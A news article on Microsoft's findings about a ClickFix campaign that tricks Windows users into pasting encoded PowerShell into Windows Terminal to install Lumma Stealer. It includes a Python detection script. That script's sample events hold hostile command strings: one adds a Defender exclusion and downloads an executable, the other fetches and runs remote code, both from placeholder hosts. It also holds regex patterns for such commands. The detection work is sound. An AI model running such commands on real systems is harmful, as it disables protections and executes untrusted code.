Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal
A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys to their browser vault.
According to Microsoft Threat Intelligence, the campaign surfaced in February and tweaks the familiar ClickFix playbook in a way designed to sidestep some existing security detections. Traditionally, these scams try to persuade victims to open the Windows Run dialog with the old Win + R shortcut and paste in a command supplied by a fake CAPTCHA or troubleshooting prompt. This time, the crooks are pointing users somewhere slightly different: Win + X followed by I, the Power User menu shortcut that opens Windows Terminal on Windows 11.
While security tools have become fairly good at spotting suspicious activity launched from the Run dialog, Windows Terminal is a legitimate administrative tool that many developers open every day. The difference matters to detection logic: a command entered in the Run dialog is spawned by explorer.exe, so a rule that fires on explorer.exe starting PowerShell with an encoded command line catches the classic variant, whereas a command pasted into an open terminal is executed by the terminal's own PowerShell session and its parent is that interactive shell, not explorer.exe. In other words, it looks normal enough to blend into routine system activity, which is exactly what attackers want.
The scam itself sticks to the same tried-and-tested social engineering formula. Victims land on a web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page then instructs them to copy a command and paste it into Windows Terminal, usually framed as something harmless like verifying their connection or fixing an error.
What the victims actually paste is a heavily encoded PowerShell command that kicks off a surprisingly elaborate chain of events.
In one version of the attack, the command unpacks itself and pulls down a renamed copy of the 7-Zip archive utility along with a compressed payload. The archive tool then extracts further components that establish persistence, fiddle with Microsoft Defender exclusions, and begin collecting system and browser data. The final stage deploys Lumma Stealer, a common infostealer that injects itself into Chrome and Edge processes to siphon off stored login credentials and other browser goodies.
A second infection path uses a similarly encoded command to fetch a batch script that drops a VBScript file and executes it using a mix of built-in Windows utilities, including MSBuild.
At that point, the script retrieves its next stage from public blockchain infrastructure – a trick dubbed "EtherHiding", in which the payload or its address is stored in a smart contract so that it can be updated without touching a conventional hosting server – before launching the same credential-harvesting routine.
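The detection point above (a pasted command whose parent is the terminal's own shell rather than explorer.exe) and the stages just described (an encoded PowerShell launcher that tampers with Defender exclusions and fetches a renamed 7-Zip) can be checked together against process-creation telemetry. The following Python is an added example written for this article, not code from Microsoft or from the campaign: it decodes PowerShell's `-EncodedCommand` argument (base64 of UTF-16LE), rebuilds the parent chain from Sysmon-style ProcessCreate fields, and labels the origin. The event records, hostnames and indicator patterns are constructed for illustration and are assumptions of the example, not published signatures.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Optional

# Every prefix of "EncodedCommand" that powershell.exe accepts (-e, -enc, -EncodedCommand, ...).
_ENC_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)}

# Indicator patterns are this example's own assumption, chosen from behaviours the article
# attributes to the chain (Defender exclusions, downloading a renamed 7-Zip, MSBuild/VBScript).
SUSPICIOUS_PATTERNS = {
    "defender_exclusion": re.compile(r"Add-MpPreference|-ExclusionPath", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "inline_eval": re.compile(r"\biex\b|Invoke-Expression|FromBase64String", re.I),
    "archive_tool": re.compile(r"7z", re.I),
    "script_lolbin": re.compile(r"msbuild\.exe|wscript\.exe|cscript\.exe", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] in "-/" and flag[1:].lower() in _ENC_FLAGS:
            try:
                return base64.b64decode(value, validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event: dict, by_pid: dict) -> list:
    """Parent, grandparent, ... image names, rebuilt from ParentProcessId links.
    Sysmon records only the immediate parent, so the terminal two hops up is invisible
    unless the tree is reconstructed from earlier process-creation events."""
    chain = [_basename(event["ParentImage"])]
    seen = {event["ProcessId"]}
    pid = event["ParentProcessId"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["ParentImage"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def classify_origin(chain: list) -> str:
    if chain and chain[0] == "explorer.exe":
        return "run_dialog"        # Run dialog (and double-clicked files) spawn from explorer.exe
    if "windowsterminal.exe" in chain:
        return "windows_terminal"  # pasted into a shell hosted by Windows Terminal
    return "other"


@dataclass
class Finding:
    pid: int
    origin: str
    indicators: list
    decoded: Optional[str]


def analyze(events: list) -> list:
    """Flag process-creation events whose (decoded) command line carries ClickFix-style stages."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        decoded = decode_encoded_command(e["CommandLine"])
        # Match on the decoded script when there is one; raw base64 would give random hits.
        script = decoded if decoded is not None else e["CommandLine"]
        indicators = (["encoded_command"] if decoded is not None else []) + [
            name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(script)]
        if indicators:
            findings.append(Finding(e["ProcessId"], classify_origin(ancestry(e, by_pid)), indicators, decoded))
    return findings


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed Sysmon-style ProcessCreate records (not real telemetry); hosts and paths are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WT = r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe"
TERMINAL_STAGE = ("Add-MpPreference -ExclusionPath $env:TEMP; "
                  "Invoke-WebRequest http://payload.example/7za.exe -OutFile $env:TEMP\\svc.exe")
RUN_DIALOG_STAGE = "iex (New-Object Net.WebClient).DownloadString('http://captcha.example/v')"
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 90, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 80, "Image": WT,
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "WindowsTerminal.exe"},
    # The terminal's own interactive shell: indistinguishable from a developer's session.
    {"ProcessId": 210, "ParentProcessId": 200, "Image": PS, "ParentImage": WT, "CommandLine": "powershell.exe"},
    # The pasted command: its immediate parent is the interactive powershell.exe, not explorer.exe.
    {"ProcessId": 220, "ParentProcessId": 210, "Image": PS, "ParentImage": PS,
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -e " + _enc(TERMINAL_STAGE)},
    # The older Run-dialog variant, launched straight from explorer.exe.
    {"ProcessId": 300, "ParentProcessId": 100, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -enc " + _enc(RUN_DIALOG_STAGE)},
    # Benign developer activity under the same terminal, which must not be flagged.
    {"ProcessId": 410, "ParentProcessId": 210, "Image": r"C:\Program Files\Git\cmd\git.exe",
     "ParentImage": PS, "CommandLine": "git.exe status"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid={f.pid} origin={f.origin} indicators={f.indicators}\n   decoded: {f.decoded}")
```

Run on the constructed events, the pasted command is attributed to `windows_terminal` only because the chain is walked past the interactive `powershell.exe` to `WindowsTerminal.exe`; a rule that looks at `ParentImage` alone sees a PowerShell child of PowerShell and nothing else, which is exactly the gap the campaign exploits. A pasted command that is not base64-encoded would still be caught by the raw command-line patterns, and a `-ep` (ExecutionPolicy) switch is deliberately not mistaken for `-e`.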
ClickFix campaigns have been circulating for well over a year now, largely because they rely on the depressingly reliable tactic of persuading users to run the malicious command themselves. The scheme has already been used to spread various infostealers and other nasties by disguising the instructions as routine verification steps.
Microsoft's latest findings suggest the scammers are simply adapting the formula to keep one step ahead of security tools – and betting that if a command runs in a legitimate terminal window, many users will assume it's just fine. ®